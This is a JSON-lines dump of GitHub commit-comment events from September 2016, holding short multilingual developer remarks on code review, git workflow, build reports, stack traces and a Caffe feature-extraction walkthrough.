{"id":"4613513285","type":"CommitCommentEvent","actor":{"login":"Too-Naive"},"repo":{"name":"racaljk/hosts"},"payload":{"comment":{"id":19161699,"position":null,"line":null,"path":null,"commit_id":"736769cd8a7d671753d8b42bbfb50d815ba979e3","created_at":"2016-09-25T02:09:19Z","updated_at":"2016-09-25T02:09:19Z","body":"忘了…\r\n\r\n\r\n\r\nOn SCaffrey <notifications@github.com>, Sep 25, 2016 10:08 AM wrote:\r\n\r\n静静你是不是Pull了。。。 感觉rebase更好哎\r\n\r\n—\r\nYou are receiving this because you authored the thread.\r\nReply to this email directly, view it on GitHub<https://github.com/racaljk/hosts/commit/736769cd8a7d671753d8b42bbfb50d815ba979e3#commitcomment-19161695>, or mute the thread<https://github.com/notifications/unsubscribe-auth/APu4H2D9UeOu5csWLEf7HZJ9Uo5k5DGsks5qtdeRgaJpZM4KFn1P>.\r\n"}},"created_at":"2016-09-25T02:09:19Z"}
{"id":"4613515754","type":"CommitCommentEvent","actor":{"login":"dingqz"},"repo":{"name":"dingqz/Java"},"payload":{"comment":{"id":19161705,"position":null,"line":null,"path":null,"commit_id":"cbf1576b408e310a2fe1363dc1a1f7c97d68f7a1","created_at":"2016-09-25T02:12:00Z","updated_at":"2016-09-25T02:12:00Z","body":"true\r\ntrue\r\ntrue\r\ntrue\r\na的值是:5   b的值是:11\r\nc的值是:5   d的值是:10\r\n"}},"created_at":"2016-09-25T02:12:00Z"}
{"id":"4613519151","type":"CommitCommentEvent","actor":{"login":"ThunderGemios10"},"repo":{"name":"mikotoiii/The-Super-Duper-Script-Editor-2"},"payload":{"comment":{"id":19161718,"position":null,"line":null,"path":null,"commit_id":"72d4546e526f1cbfcb7e7f449fb209ad64fb6a26","created_at":"2016-09-25T02:15:37Z","updated_at":"2016-09-25T02:15:37Z","body":"@mikotoiii I have the real gfx_base.zip which contains all DR2's gfx files.\r\n\r\nI will upload it on my repo soon."}},"created_at":"2016-09-25T02:15:37Z"}
{"id":"4613521988","type":"CommitCommentEvent","actor":{"login":"SJTUsuperxu"},"repo":{"name":"SJTUsuperxu/SBD-via-CNN"},"payload":{"comment":{"id":19161725,"position":1,"line":1,"path":"README.md","commit_id":"9e75b43b8a024f9dc5b7032b61e160194f19b6a2","created_at":"2016-09-25T02:18:32Z","updated_at":"2016-09-25T02:18:32Z","body":"1.初始化操作\r\n(1) 进入caffe根目录(本文中caffe的根目录都为caffe-root)，创建临时文件夹，用于存放所需要的临时文件\r\n\t\tmkdir examples/_temp\r\n\r\n(2) 将视频转为一帧帧图片并将图片复制到 examples/images 文件夹下\r\n\t\tpython VideoToImg.py \r\n\t\t\r\n(3) 根据examples/images文件夹中的图片，创建包含图像列表的txt文件，并添加标签（0）\r\n\t\tfind `pwd`/examples/images -type f -exec echo {} \\; > examples/_temp/temp.txt\r\n\t或者 python getList.py\r\n\r\n(4) 执行下列脚本，下载imagenet12图像均值文件，在后面的网络结构定义prototxt文件中，需要用到该文件 （data/ilsvrc212/imagenet_mean.binaryproto）.下载模型以及定义prototxt。\r\n\t\tsh ./data/ilsvrc12/get_ilsvrc_aux.sh\r\n(5) 将网络定义prototxt文件复制到_temp文件夹下, 并修改 batchsize\r\n\t\tcp examples/feature_extraction/imagenet_val.prototxt examples/_temp\r\n\t\t\r\n(6) 批量提取图片特征\r\n\t\tsh extract_fea.sh\t\t\r\n\t( 输入:存有若干图片的文件夹路径 ; 输出:每张图片fc7输出的特征向量vec[i] )\r\n\t起源于前几天想用for循环去forward处理每张图片,但得到的结果不正确\r\n\t原因在于进行forward过程时一个batch对应的blobs数据在被存储前就被下一个batch\r\n\t函数:\r\n\t1 ) feat_helper_pb2.py : 保存每层输出的数据为lmdb格式\r\n\t2 ) lmdb2mat.py : 将lmdb数据转化成.mat数据\r\n\t3 ) extract_fea.sh : 初始化相关参数\r\n\t修改:\r\n\t前两个不用修改,直接放到caffe_root目录下\r\n\t对 3)的修改: \r\n\t<1> BATCHSIZE ; BATCHNUM : 要保证BATCHSIZE*BATCHNUM = 图片总数\r\n\t<2> 还需要保证 BATCHSIZE * batch_size(位于deploy.prototxt中) >= 图片总数\r\n\t另外,如果要提取其他层的特征,需要修改对应的 Layer, Dim,和Out路径\r\n\r\n2. 主程序\r\n\t\tpython SBD_CNN.py \"videoName: anni009.mpg\"\r\n\t注意修改存放的向量 matfile 和 输出结果 Notes 的名称"}},"created_at":"2016-09-25T02:18:32Z"}
{"id":"4613522719","type":"CommitCommentEvent","actor":{"login":"c99koder"},"repo":{"name":"The0x539/android"},"payload":{"comment":{"id":19161729,"position":5,"line":55,"path":"src/com/irccloud/android/ColorScheme.java","commit_id":"00363c51583e7a3a23ffa25c69327058d9fe1fb9","created_at":"2016-09-25T02:19:24Z","updated_at":"2016-09-25T02:19:24Z","body":"This line should be \"return actionbar?R.style.midnight:R.style.midnightNoActionBar;\""}},"created_at":"2016-09-25T02:19:24Z"}
{"id":"4613522770","type":"CommitCommentEvent","actor":{"login":"ThunderGemios10"},"repo":{"name":"mikotoiii/The-Super-Duper-Script-Editor-2"},"payload":{"comment":{"id":19161730,"position":null,"line":null,"path":null,"commit_id":"317ab21dd49f53ac8e9c3143d5500a0e0528fda3","created_at":"2016-09-25T02:19:27Z","updated_at":"2016-09-25T02:19:27Z","body":"Thanks for the updates @mikotoiii I have updated my repo as well."}},"created_at":"2016-09-25T02:19:27Z"}
{"id":"4613523100","type":"CommitCommentEvent","actor":{"login":"jacksenechal"},"repo":{"name":"eberlitz/splashicon-generator"},"payload":{"comment":{"id":19161733,"position":null,"line":null,"path":null,"commit_id":"7aa8f2f9c330bc5e0a8bcd41bafe5217677e1f61","created_at":"2016-09-25T02:19:49Z","updated_at":"2016-09-25T02:19:49Z","body":"The bin file wasn't actually wrong in the repo. In the npm module it had the wrong line endings for Unix systems (preventing it from executing) because the npm module was generated on Windows, and on checkout git was converting the line endings. This file prevents git from doing that. I've tested the new binary in the latest release and it appears to be working correctly."}},"created_at":"2016-09-25T02:19:49Z"}
{"id":"4613523884","type":"CommitCommentEvent","actor":{"login":"kingthorin"},"repo":{"name":"adrianclay/zap-extensions"},"payload":{"comment":{"id":19161736,"position":null,"line":null,"path":null,"commit_id":"1cdbf5dcad7d94e74d49a97b8b0dd71f8bb80b93","created_at":"2016-09-25T02:20:30Z","updated_at":"2016-09-25T02:20:30Z","body":"Hey Adrian, I think this pull is close to ready. The functionality seems ok to me. We put together some guidance for UnitTests just the other day and the function name part seems applicable here. https://github.com/zaproxy/zaproxy/wiki/DevGuidelines#unit-test-specific-guidelines"}},"created_at":"2016-09-25T02:20:30Z"}
{"id":"4613525071","type":"CommitCommentEvent","actor":{"login":"shurcooL"},"repo":{"name":"gogo/protobuf"},"payload":{"comment":{"id":19161741,"position":null,"line":null,"path":null,"commit_id":"08dc052e9af8ac508edec335d01020a54d0989a9","created_at":"2016-09-25T02:21:45Z","updated_at":"2016-09-25T02:21:45Z","body":"I see, thank you."}},"created_at":"2016-09-25T02:21:45Z"}
{"id":"4613526077","type":"CommitCommentEvent","actor":{"login":"w0726"},"repo":{"name":"ZhangQiaolun/PingPing"},"payload":{"comment":{"id":19161744,"position":null,"line":null,"path":null,"commit_id":"b2bac161ce510febff8f692c423e03d05a333b8b","created_at":"2016-09-25T02:22:48Z","updated_at":"2016-09-25T02:22:48Z","body":"如果只是这些功能会不会太无聊了些？还是先把这些基础功能做出来之后再考虑添加其他功能？我又想到了一些比较有意思的衍生功能。咱们下午的时候是不是可以讨论一下~"}},"created_at":"2016-09-25T02:22:48Z"}
{"id":"4613527835","type":"CommitCommentEvent","actor":{"login":"gangstara2"},"repo":{"name":"gangstara2/hanu-project"},"payload":{"comment":{"id":19161751,"position":null,"line":null,"path":null,"commit_id":"1f8469085b197c88b2794fc0b56a7bb1973d8cce","created_at":"2016-09-25T02:24:51Z","updated_at":"2016-09-25T02:24:51Z","body":"> hint: its remote counterpart. Integrate the remote changes (e.g.\r\nhint: 'git pull ...') before pushing again.\r\n\r\nô phải liên tục dùng git pull để lấy code mới về rồi mới commit rồi push đc lên"}},"created_at":"2016-09-25T02:24:51Z"}
{"id":"4613528335","type":"CommitCommentEvent","actor":{"login":"hbashton"},"repo":{"name":"halogenOS/android_build"},"payload":{"comment":{"id":19161753,"position":null,"line":null,"path":null,"commit_id":"fcc4b2fc143062f8051ba81133d68ac41d69deab","created_at":"2016-09-25T02:25:14Z","updated_at":"2016-09-25T02:25:14Z","body":"My machine is very aggressive ;)\n\nSent from my iPhone\n\n> On Sep 24, 2016, at 2:23 PM, Neil Agarwal <notifications@github.com> wrote:\n> \n> k\n> \n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n"}},"created_at":"2016-09-25T02:25:14Z"}
{"id":"4613529590","type":"CommitCommentEvent","actor":{"login":"marrub--"},"repo":{"name":"Team-Doominati/Doominati"},"payload":{"comment":{"id":19161759,"position":null,"line":null,"path":null,"commit_id":"2629677ef525b0b9085d50f3a82944a2f5fc5528","created_at":"2016-09-25T02:26:37Z","updated_at":"2016-09-25T02:26:37Z","body":"Y'know, there's a word for that. It's called \"absolute\"."}},"created_at":"2016-09-25T02:26:37Z"}
{"id":"4613530619","type":"CommitCommentEvent","actor":{"login":"indiv0"},"repo":{"name":"davideagen/rusoto"},"payload":{"comment":{"id":19161762,"position":4,"line":414,"path":"codegen/src/generator/ec2.rs","commit_id":"889b9f60970a8e7c2f5ee6ff01c8d877bde43cab","created_at":"2016-09-25T02:27:45Z","updated_at":"2016-09-25T02:27:45Z","body":"For what it's worth, I'm adding the same functionality in PR #235 (as seen [here](https://github.com/indiv0/rusoto/blob/7219cce57307e06f33d2d51eeff82123c275a954/codegen/src/util.rs)).\r\n\r\nWould you mind refactoring this code to its own function so I can just use yours once your PR lands?"}},"created_at":"2016-09-25T02:27:45Z"}
{"id":"4613531479","type":"CommitCommentEvent","actor":{"login":"onbjerg"},"repo":{"name":"tbug/tbug.github.io"},"payload":{"comment":{"id":19161766,"position":181,"line":228,"path":"_posts/2016-03-28-initial-thoughts-on-elixir.md","commit_id":"28edaab38d71e599a27d7f41cccd0cb90b568de6","created_at":"2016-09-25T02:28:44Z","updated_at":"2016-09-25T02:28:44Z","body":"is"}},"created_at":"2016-09-25T02:28:44Z"}
{"id":"4613534286","type":"CommitCommentEvent","actor":{"login":"Gustav-Simonsson"},"repo":{"name":"Gustav-Simonsson/go-ethereum"},"payload":{"comment":{"id":19161779,"position":44,"line":100,"path":"core/state/statedb.go","commit_id":"94ba7de5fca91cca17e2da38c397f77d1ac75698","created_at":"2016-09-25T02:31:34Z","updated_at":"2016-09-25T02:31:34Z","body":"Ah yeah, sorry - this was while testing - with these commented out journaling is noop. "}},"created_at":"2016-09-25T02:31:34Z"}
{"id":"4613536426","type":"CommitCommentEvent","actor":{"login":"sinkillerj"},"repo":{"name":"sinkillerj/ProjectE"},"payload":{"comment":{"id":19161789,"position":null,"line":null,"path":null,"commit_id":"3d21edebcc6e5e4debdb217dac9c3121e51cb073","created_at":"2016-09-25T02:34:00Z","updated_at":"2016-09-25T02:34:00Z","body":"How in the world did we forget this? ._."}},"created_at":"2016-09-25T02:34:00Z"}
{"id":"4613537795","type":"CommitCommentEvent","actor":{"login":"holofractal"},"repo":{"name":"CyanogenMod/android_device_htc_pme"},"payload":{"comment":{"id":19161793,"position":null,"line":null,"path":null,"commit_id":"ee57d908023d86f3f11110312734ec76bb7957cd","created_at":"2016-09-25T02:35:18Z","updated_at":"2016-09-25T02:35:18Z","body":"I'm not a coder, but is there a way to detect the device CID, and set the default network according to that? The reason I ask is I cannot log into my Google account with 2FA during first time setup if the network is in GSM mode, because my device is CDMA (Sprint). "}},"created_at":"2016-09-25T02:35:18Z"}
{"id":"4613538580","type":"CommitCommentEvent","actor":{"login":"apmuthu"},"repo":{"name":"simpleinvoices/simpleinvoices"},"payload":{"comment":{"id":19161797,"position":null,"line":null,"path":null,"commit_id":"d163cd9e7eee6abf2d7774e84af45b3d357d5c10","created_at":"2016-09-25T02:36:04Z","updated_at":"2016-09-25T02:36:04Z","body":"Your changes to ````include/include_auth.php ```` will result in only the first extension in the array having the said file to be included. A daisy chain of all auth may be preferable or some priority in the auth be leveraged possibly set in the config file."}},"created_at":"2016-09-25T02:36:04Z"}
{"id":"4613539783","type":"CommitCommentEvent","actor":{"login":"tandob-aosp"},"repo":{"name":"xpirt/sdat2img"},"payload":{"comment":{"id":19161801,"position":null,"line":null,"path":null,"commit_id":"8ec97e5644175752f14a6f1c832d244aa93ec909","created_at":"2016-09-25T02:37:21Z","updated_at":"2016-09-25T02:37:21Z","body":"  File \"./sdat2img.py\", line 77\r\n    print('\\nDetected system version: ', end=''),\r\n                                            ^\r\n"}},"created_at":"2016-09-25T02:37:21Z"}
{"id":"4613541961","type":"CommitCommentEvent","actor":{"login":"The0x539"},"repo":{"name":"The0x539/android"},"payload":{"comment":{"id":19161808,"position":5,"line":55,"path":"src/com/irccloud/android/ColorScheme.java","commit_id":"00363c51583e7a3a23ffa25c69327058d9fe1fb9","created_at":"2016-09-25T02:39:39Z","updated_at":"2016-09-25T02:39:39Z","body":"PEBKAC at its finest"}},"created_at":"2016-09-25T02:39:39Z"}
{"id":"4613542334","type":"CommitCommentEvent","actor":{"login":"Gautony"},"repo":{"name":"Ar1i/PokemonGo-Bot"},"payload":{"comment":{"id":19161812,"position":null,"line":null,"path":null,"commit_id":"c5ac8d642a9f913041868c671978bdaa9f86158e","created_at":"2016-09-25T02:40:05Z","updated_at":"2016-09-25T02:40:05Z","body":"[09:39:17] [PokemonList-Error]    at System.Windows.Forms.CheckedListBox.SetItemCheckState(Int32 index, CheckState value)\r\n   at System.Windows.Forms.CheckedListBox.SetItemChecked(Int32 index, Boolean value)\r\n   at PokemonGo.RocketAPI.Console.SniperPanel.Execute()\r\n   at PokemonGo.RocketAPI.Console.Pokemons.<Execute>d__15.MoveNext()\r\n[09:39:23] [PokemonList-Error]    at System.Windows.Forms.CheckedListBox.SetItemCheckState(Int32 index, CheckState value)\r\n   at System.Windows.Forms.CheckedListBox.SetItemChecked(Int32 index, Boolean value)\r\n   at PokemonGo.RocketAPI.Console.SniperPanel.Execute()\r\n   at PokemonGo.RocketAPI.Console.Pokemons.<Execute>d__15.MoveNext()\r\n[09:39:29] [PokemonList-Error]    at System.Windows.Forms.CheckedListBox.SetItemCheckState(Int32 index, CheckState value)\r\n   at System.Windows.Forms.CheckedListBox.SetItemChecked(Int32 index, Boolean value)\r\n   at PokemonGo.RocketAPI.Console.SniperPanel.Execute()\r\n   at PokemonGo.RocketAPI.Console.Pokemons.<Execute>d__15.MoveNext()\r\n[09:39:30] Access Token expired? Retrying in 1 second.\r\n[09:39:33] [PokemonList-Error]    at System.Windows.Forms.CheckedListBox.SetItemCheckState(Int32 index, CheckState value)\r\n   at System.Windows.Forms.CheckedListBox.SetItemChecked(Int32 index, Boolean value)\r\n   at PokemonGo.RocketAPI.Console.SniperPanel.Execute()\r\n   at PokemonGo.RocketAPI.Console.Pokemons.<Execute>d__15.MoveNext()\r\n[09:39:38] [PokemonList-Error]    at System.Windows.Forms.CheckedListBox.SetItemCheckState(Int32 index, CheckState value)\r\n   at System.Windows.Forms.CheckedListBox.SetItemChecked(Int32 index, Boolean value)\r\n   at PokemonGo.RocketAPI.Console.SniperPanel.Execute()\r\n   at PokemonGo.RocketAPI.Console.Pokemons.<Execute>d__15.MoveNext()"}},"created_at":"2016-09-25T02:40:05Z"}
{"id":"4613542612","type":"CommitCommentEvent","actor":{"login":"haha19890801"},"repo":{"name":"synman/PokeBack"},"payload":{"comment":{"id":19161813,"position":null,"line":null,"path":null,"commit_id":"8bcf7d3f8666e41aa7c9b2a464873dea6010524d","created_at":"2016-09-25T02:40:21Z","updated_at":"2016-09-25T02:40:21Z","body":"應該是我跟你說謝謝!!真的很不好意思造成你的困擾!我很抱歉"}},"created_at":"2016-09-25T02:40:21Z"}
{"id":"4613544360","type":"CommitCommentEvent","actor":{"login":"kushaltirumala"},"repo":{"name":"ethanlee16/magicite"},"payload":{"comment":{"id":19161819,"position":null,"line":null,"path":null,"commit_id":"32e4ad465b68da3308d341b012edebb591dd52b0","created_at":"2016-09-25T02:42:23Z","updated_at":"2016-09-25T02:42:23Z","body":"WOOO"}},"created_at":"2016-09-25T02:42:23Z"}
{"id":"4613544541","type":"CommitCommentEvent","actor":{"login":"aldenml"},"repo":{"name":"arvidn/libtorrent"},"payload":{"comment":{"id":19161820,"position":5,"line":84,"path":"src/broadcast_socket.cpp","commit_id":"7a99d25b5f71fa2502b8ff2de3f03b83631d4b5b","created_at":"2016-09-25T02:42:35Z","updated_at":"2016-09-25T02:42:35Z","body":"I suppose there are missing ' ' characters here :)"}},"created_at":"2016-09-25T02:42:35Z"}
{"id":"4613545958","type":"CommitCommentEvent","actor":{"login":"neoaero99"},"repo":{"name":"skuhl/RobotRun"},"payload":{"comment":{"id":19161825,"position":null,"line":null,"path":null,"commit_id":"2b279f002875ee73424f71227077761db1e28eb2","created_at":"2016-09-25T02:44:09Z","updated_at":"2016-09-25T02:44:09Z","body":"I strongly discourage you from changing the getValue() and setValue() from assuming the input is World coordinate system,  when almost all internal calculations use the Native coordinate system. There are methods for converting between Native and World positions. I would recommend that you convert the user input at the source of the input."}},"created_at":"2016-09-25T02:44:09Z"}
{"id":"4613546864","type":"CommitCommentEvent","actor":{"login":"hdfukuoka1985"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19161828,"position":35,"line":35,"path":"issue18/regist.php","commit_id":"df1870cffc8c2485d010c23815a4261ceb1ceab1","created_at":"2016-09-25T02:45:08Z","updated_at":"2016-09-25T02:45:08Z","body":"すみません、ご指摘頂いた部分修正したらあっさりと解決しました…。\r\n\r\n$stmt->bindParam(':timestamp', $timestamp, PDO::PARAM_STR);\r\n\r\n今後は自分でもデバッグを重ねるようにしたいと思います。"}},"created_at":"2016-09-25T02:45:08Z"}
{"id":"4613547620","type":"CommitCommentEvent","actor":{"login":"Refchen96"},"repo":{"name":"Refchen96/-"},"payload":{"comment":{"id":19161830,"position":null,"line":null,"path":null,"commit_id":"3d808d1529108ee5f7c399d4cb15bfdddc4e3f3f","created_at":"2016-09-25T02:45:52Z","updated_at":"2016-09-25T02:45:52Z","body":"手机卫士"}},"created_at":"2016-09-25T02:45:52Z"}
{"id":"4613548860","type":"CommitCommentEvent","actor":{"login":"mvbattan"},"repo":{"name":"TP0602-03/grupo-03"},"payload":{"comment":{"id":19161833,"position":12,"line":8,"path":"src/main/java/ar/fiuba/tdd/template/Cell.java","commit_id":"0f346226ae3b6839f4291e6417719a8b874ff8bb","created_at":"2016-09-25T02:47:19Z","updated_at":"2016-09-25T02:47:19Z","body":"Me parece mejor que esta excepción se lance según el tipo de celda. No sé si pueden haber más adelante celdas que acepten valores alfabéticos (como un autodefinido por ejemplo)"}},"created_at":"2016-09-25T02:47:19Z"}
{"id":"4613549693","type":"CommitCommentEvent","actor":{"login":"mikotoiii"},"repo":{"name":"mikotoiii/The-Super-Duper-Script-Editor-2"},"payload":{"comment":{"id":19161836,"position":null,"line":null,"path":null,"commit_id":"317ab21dd49f53ac8e9c3143d5500a0e0528fda3","created_at":"2016-09-25T02:48:14Z","updated_at":"2016-09-25T02:48:14Z","body":"As i make changes and get things working, i can make pull requests if you want to merge the code back into the master."}},"created_at":"2016-09-25T02:48:14Z"}
{"id":"4613550223","type":"CommitCommentEvent","actor":{"login":"mvbattan"},"repo":{"name":"TP0602-03/grupo-03"},"payload":{"comment":{"id":19161838,"position":4,"line":2,"path":"src/main/java/ar/fiuba/tdd/template/CellValue.java","commit_id":"0f346226ae3b6839f4291e6417719a8b874ff8bb","created_at":"2016-09-25T02:48:47Z","updated_at":"2016-09-25T02:48:47Z","body":"Creo que @jmoguilevsky había planteado usar CellValue<T>"}},"created_at":"2016-09-25T02:48:47Z"}
{"id":"4613552822","type":"CommitCommentEvent","actor":{"login":"robander"},"repo":{"name":"robander/dita-ot"},"payload":{"comment":{"id":19161843,"position":4,"line":713,"path":"src/main/plugins/org.dita.pdf2/cfg/fo/attrs/commons-attr.xsl","commit_id":"b77f7caa685f3fae01c5e1da509e3375f8d291e6","created_at":"2016-09-25T02:51:22Z","updated_at":"2016-09-25T02:51:22Z","body":"This is not the commit I intended. Redoing..."}},"created_at":"2016-09-25T02:51:22Z"}
{"id":"4613552963","type":"CommitCommentEvent","actor":{"login":"meepingsnesroms"},"repo":{"name":"libretro/dosbox-libretro"},"payload":{"comment":{"id":19161844,"position":192,"line":399,"path":"src/shell/shell.cpp","commit_id":"1b35508c1c49a377dbf353906985aa1b395bd361","created_at":"2016-09-25T02:51:31Z","updated_at":"2016-09-25T02:51:31Z","body":"Ok,this happened because dosbox-lfn and dosbox-libretro where almost identical, so I did direct source copys to speed it up."}},"created_at":"2016-09-25T02:51:31Z"}
{"id":"4613557179","type":"CommitCommentEvent","actor":{"login":"mydongistiny"},"repo":{"name":"PureNexusProject/android_frameworks_base"},"payload":{"comment":{"id":19161855,"position":null,"line":null,"path":null,"commit_id":"bd2170f926047fad148dfd7be8214cdc59f66249","created_at":"2016-09-25T02:55:50Z","updated_at":"2016-09-25T02:55:50Z","body":"Did you see the option to add up to 6 small quick qs toggles?"}},"created_at":"2016-09-25T02:55:50Z"}
{"id":"4613558298","type":"CommitCommentEvent","actor":{"login":"elfet"},"repo":{"name":"deployphp/deployer"},"payload":{"comment":{"id":19161859,"position":null,"line":null,"path":null,"commit_id":"f9b8b73b568afb6f8894ec0b52b9649a9dfc6c83","created_at":"2016-09-25T02:57:01Z","updated_at":"2016-09-25T02:57:01Z","body":"I think cherry pick is ok. Can you make pr?"}},"created_at":"2016-09-25T02:57:01Z"}
{"id":"4613558360","type":"CommitCommentEvent","actor":{"login":"ajdamico"},"repo":{"name":"ajdamico/asdfree"},"payload":{"comment":{"id":19161860,"position":null,"line":null,"path":null,"commit_id":"79c5bca8acf16cda9a9907599cdbaca02e5594de","created_at":"2016-09-25T02:57:04Z","updated_at":"2016-09-25T02:57:04Z","body":"thaks"}},"created_at":"2016-09-25T02:57:04Z"}
{"id":"4613559185","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"JuliaGPU/CUDA.jl"},"payload":{"comment":{"id":19161865,"position":null,"line":null,"path":null,"commit_id":"cccf07371a1e475badaef35d55a88768f898a286","created_at":"2016-09-25T02:57:55Z","updated_at":"2016-09-25T02:57:55Z","body":"metadata require is allowed to differ from package require - for registered packages, only the metadata require matters. please put all the tags back the way they were."}},"created_at":"2016-09-25T02:57:55Z"}
{"id":"4613560584","type":"CommitCommentEvent","actor":{"login":"plexoos"},"repo":{"name":"star-bnl/star-travex"},"payload":{"comment":{"id":19161872,"position":null,"line":null,"path":null,"commit_id":"3a50f4003f68ae3b639ca55fd14f93b07f7424d6","created_at":"2016-09-25T02:59:27Z","updated_at":"2016-09-25T02:59:27Z","body":"да, в общем согласен, но этот макрос не стоит возни на данный момент"}},"created_at":"2016-09-25T02:59:27Z"}
{"id":"4614839501","type":"CommitCommentEvent","actor":{"login":"masayukisumi"},"repo":{"name":"masayukisumi/Julius_py"},"payload":{"comment":{"id":19165109,"position":null,"line":null,"path":null,"commit_id":"98a9e6f700ff57fea7212a7c984cd203a9e8b747","created_at":"2016-09-25T20:02:45Z","updated_at":"2016-09-25T20:02:45Z","body":"auto_Mail.py: easiest way to send mail by python attached with the images.\r\nvgml.py : using it with Julius whenever we say パパ, the web cam takes the pictures and send it to adress."}},"created_at":"2016-09-25T20:02:45Z"}
{"id":"4614840034","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":19165111,"position":null,"line":null,"path":null,"commit_id":"34c7307529158de01da5e348194003bc91c5d5b9","created_at":"2016-09-25T20:03:07Z","updated_at":"2016-09-25T20:03:07Z","body":"\nBuild report #162624537 for sha 34c7307529158de01da5e348194003bc91c5d5b9:\n\n[![UnitTests](https://img.shields.io/badge/unittests-failed%20%281/4%29%20-red.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-15.97%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-0%20error%28s%29-brightgreen.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-3755%20/%2010043%20%2837.39%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-36.86%20%25-yellow.svg)](#)\n\n\n[Reports](https://psycofdj.github.io/xtdcpp/more_documentation/)\n      "}},"created_at":"2016-09-25T20:03:07Z"}
{"id":"4614841160","type":"CommitCommentEvent","actor":{"login":"masayukisumi"},"repo":{"name":"masayukisumi/Julius_py"},"payload":{"comment":{"id":19165123,"position":8,"line":8,"path":"autoMail.py","commit_id":"98a9e6f700ff57fea7212a7c984cd203a9e8b747","created_at":"2016-09-25T20:03:48Z","updated_at":"2016-09-25T20:03:48Z","body":"quted from "}},"created_at":"2016-09-25T20:03:48Z"}
{"id":"4614842195","type":"CommitCommentEvent","actor":{"login":"Buttys"},"repo":{"name":"Buttys/Dev_ygopro"},"payload":{"comment":{"id":19165124,"position":null,"line":null,"path":null,"commit_id":"98663521d53ec61ebf877b83dff712875c6e8d80","created_at":"2016-09-25T20:04:19Z","updated_at":"2016-09-25T20:04:19Z","body":"You should handle anything online related on the servers"}},"created_at":"2016-09-25T20:04:19Z"}
{"id":"4614844013","type":"CommitCommentEvent","actor":{"login":"albertlua"},"repo":{"name":"albertlua/phpvms-skyjet"},"payload":{"comment":{"id":19165134,"position":null,"line":null,"path":null,"commit_id":"8326b7ea10bfd9e2268c0ecbcfcb1fa5870a444b","created_at":"2016-09-25T20:05:25Z","updated_at":"2016-09-25T20:05:25Z","body":"The date is incorrect in the naming scheme; the correct name is 9-25-2016-2000"}},"created_at":"2016-09-25T20:05:25Z"}
{"id":"4614844817","type":"CommitCommentEvent","actor":{"login":"Mottie"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":19165137,"position":null,"line":null,"path":null,"commit_id":"46a4fe124464a21eeafc1181e4222c749392c81c","created_at":"2016-09-25T20:05:55Z","updated_at":"2016-09-25T20:05:55Z","body":"@silverwind I'm not sure where in the process this is happening, but somehow only this image's encoding is being switched to all lower case.\r\n\r\nI need a break, so if you don't get around to it, I'll look later. Thanks!"}},"created_at":"2016-09-25T20:05:55Z"}
{"id":"4614846085","type":"CommitCommentEvent","actor":{"login":"Dabug123"},"repo":{"name":"CypherOS/frameworks_base"},"payload":{"comment":{"id":19165143,"position":null,"line":null,"path":null,"commit_id":"0ce7dfbf0b1a7dc92dfd1e8550555b445afb5048","created_at":"2016-09-25T20:06:40Z","updated_at":"2016-09-25T20:06:40Z","body":"Kang a day keep the doctor away"}},"created_at":"2016-09-25T20:06:40Z"}
{"id":"4614846712","type":"CommitCommentEvent","actor":{"login":"dmmc12"},"repo":{"name":"dmmc12/public-api"},"payload":{"comment":{"id":19165147,"position":2,"line":2,"path":"get_account_numbers","commit_id":"82af1c9c2588dbb3f5ed7aeaacccce963392ac9b","created_at":"2016-09-25T20:07:07Z","updated_at":"2016-09-25T20:07:07Z","body":"Thanks Alex, I was using this as I did have more metadata per row per number but I decided to take it out. I'll branch off and see what it's like to use it! \r\n\r\n"}},"created_at":"2016-09-25T20:07:07Z"}
{"id":"4614847780","type":"CommitCommentEvent","actor":{"login":"dmmc12"},"repo":{"name":"dmmc12/public-api"},"payload":{"comment":{"id":19165154,"position":2,"line":2,"path":"get_account_numbers","commit_id":"82af1c9c2588dbb3f5ed7aeaacccce963392ac9b","created_at":"2016-09-25T20:07:46Z","updated_at":"2016-09-25T20:07:46Z","body":"Forgot to remove it then, NooB mistake. Learning all the way!"}},"created_at":"2016-09-25T20:07:46Z"}
{"id":"4614847849","type":"CommitCommentEvent","actor":{"login":"drybjed"},"repo":{"name":"debops/ansible-apache"},"payload":{"comment":{"id":19165155,"position":31,"line":158,"path":"docs/defaults-detailed.rst","commit_id":"9334c398d403f768693cc9e021a40226ad181caf","created_at":"2016-09-25T20:07:47Z","updated_at":"2016-09-25T20:07:47Z","body":"What happened here, a `<Tab>` character?"}},"created_at":"2016-09-25T20:07:47Z"}
{"id":"4614849119","type":"CommitCommentEvent","actor":{"login":"robinsch"},"repo":{"name":"cmangos/mangos-tbc"},"payload":{"comment":{"id":19165157,"position":null,"line":null,"path":null,"commit_id":"adceff998158c4a075a3ca19f0143dc2fe35adee","created_at":"2016-09-25T20:08:36Z","updated_at":"2016-09-25T20:08:36Z","body":"You couldn't use auto repeat spells when being rooted like wand."}},"created_at":"2016-09-25T20:08:36Z"}
{"id":"4614849230","type":"CommitCommentEvent","actor":{"login":"rashmangi"},"repo":{"name":"rashmangi/YII2_basic"},"payload":{"comment":{"id":19165159,"position":null,"line":null,"path":null,"commit_id":"af201c3b905621665bd245403c26bacbcc30d21d","created_at":"2016-09-25T20:08:41Z","updated_at":"2016-09-25T20:08:41Z","body":"My Yii2 Basic"}},"created_at":"2016-09-25T20:08:41Z"}
{"id":"4614850680","type":"CommitCommentEvent","actor":{"login":"nordsimon"},"repo":{"name":"silas/node-consul"},"payload":{"comment":{"id":19165161,"position":null,"line":null,"path":null,"commit_id":"db420b2ed72a38ec32947b7b57bef954010377c0","created_at":"2016-09-25T20:09:35Z","updated_at":"2016-09-25T20:09:35Z","body":"Oh, my bad. Scanned through package.json to fast. Anyhow, thanks for pulling this in and clarifying the test. Now I can remove my object assigns everywhere. Might have some more stuff for this module in the future. Found some things in the api that wasn't supported. Cheers"}},"created_at":"2016-09-25T20:09:35Z"}
